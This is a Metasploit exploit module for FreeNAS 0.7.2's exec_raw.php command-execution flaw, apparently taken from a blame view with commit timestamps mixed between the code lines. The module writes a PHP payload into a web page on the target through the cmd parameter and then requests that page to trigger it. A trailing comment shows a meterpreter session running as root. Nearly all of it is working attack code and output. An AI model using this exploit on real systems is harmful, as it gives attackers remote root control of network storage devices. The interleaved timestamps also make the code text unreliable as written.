2010-11-12 23:02:28 +00:00
##
2014-10-17 16:47:33 +00:00
# This module requires Metasploit: http://metasploit.com/download
2013-10-15 18:50:46 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
2010-11-12 23:02:28 +00:00
##
require 'msf/core'
class Metasploit3 < Msf :: Exploit :: Remote
2013-08-30 21:28:54 +00:00
Rank = GreatRanking
2010-11-12 23:02:28 +00:00
2013-08-30 21:28:54 +00:00
include Msf :: Exploit :: Remote :: HttpClient
2010-11-12 23:02:28 +00:00
2013-08-30 21:28:54 +00:00
def initialize ( info = { } )
super ( update_info ( info ,
'Name' = > 'FreeNAS exec_raw.php Arbitrary Command Execution' ,
'Description' = > %q{
This module exploits an arbitrary command execution flaw
in FreeNAS 0 . 7 . 2 < rev . 5543 . When passing a specially formatted URL
to the exec_raw . php page , an attacker may be able to execute arbitrary
commands .
2010-11-12 23:14:46 +00:00
2013-08-30 21:28:54 +00:00
NOTE : This module works best with php / meterpreter payloads .
} ,
'Author' = > [ 'MC' ] ,
'License' = > MSF_LICENSE ,
'References' = >
[
[ 'OSVDB' , '94441' ] ,
[ 'URL' , 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ]
] ,
'Payload' = >
{
'Space' = > 6144 ,
'DisableNops' = > true ,
'BadChars' = > " ` \" ' %&x " ,
} ,
'Targets' = >
[
[ 'Automatic Target' , { } ]
] ,
'Privileged' = > true ,
'Platform' = > 'php' ,
'Arch' = > ARCH_PHP ,
'DisclosureDate' = > 'Nov 6 2010' ,
'DefaultTarget' = > 0 ) )
end
2010-11-12 23:02:28 +00:00
2013-08-30 21:28:54 +00:00
def exploit
2010-11-12 23:02:28 +00:00
2013-08-30 21:28:54 +00:00
page = rand_text_alpha_upper ( rand ( 5 ) + 1 ) + " .php "
2010-11-12 23:02:28 +00:00
2013-08-30 21:28:54 +00:00
shellcode = payload . encoded
2010-11-12 23:02:28 +00:00
2013-08-30 21:28:54 +00:00
sploit = " echo \" <?php \n #{ shellcode } \n ?> \" > #{ page } "
2010-11-12 23:14:46 +00:00
2013-08-30 21:28:54 +00:00
print_status ( " Sending exploit page ' #{ page } ' " )
2010-11-12 23:14:46 +00:00
2013-08-30 21:28:54 +00:00
res = send_request_raw (
{
'uri' = > " /exec_raw.php?cmd= " + Rex :: Text . uri_encode ( sploit ) ,
} , 10 )
2010-11-12 23:02:28 +00:00
2013-08-30 21:28:54 +00:00
if ( res and res . code == 200 )
print_status ( " Triggering payload... " )
send_request_raw ( { 'uri' = > " / #{ page } " } , 5 )
handler
else
print_error ( " Exploit failed. " )
return
end
2010-11-12 23:02:28 +00:00
2013-08-30 21:28:54 +00:00
end
2010-11-12 23:02:28 +00:00
end
2010-11-12 23:14:46 +00:00
2010-11-12 23:02:28 +00:00
= begin
meterpreter > sysinfo
Computer : freenas . local
OS : FreeBSD freenas . local 7 . 3 - RELEASE - p2 FreeBSD 7 . 3 - RELEASE - p2 #0: Sat Jul 31 12:22:04 CEST 2010 root@dev.freenas.org:/usr/obj/freenas/usr/src/sys/FREENAS-i386 i386
meterpreter > getuid
Server username : root ( 0 )
2010-11-12 23:14:46 +00:00
meterpreter >
2010-11-12 23:02:28 +00:00
= end
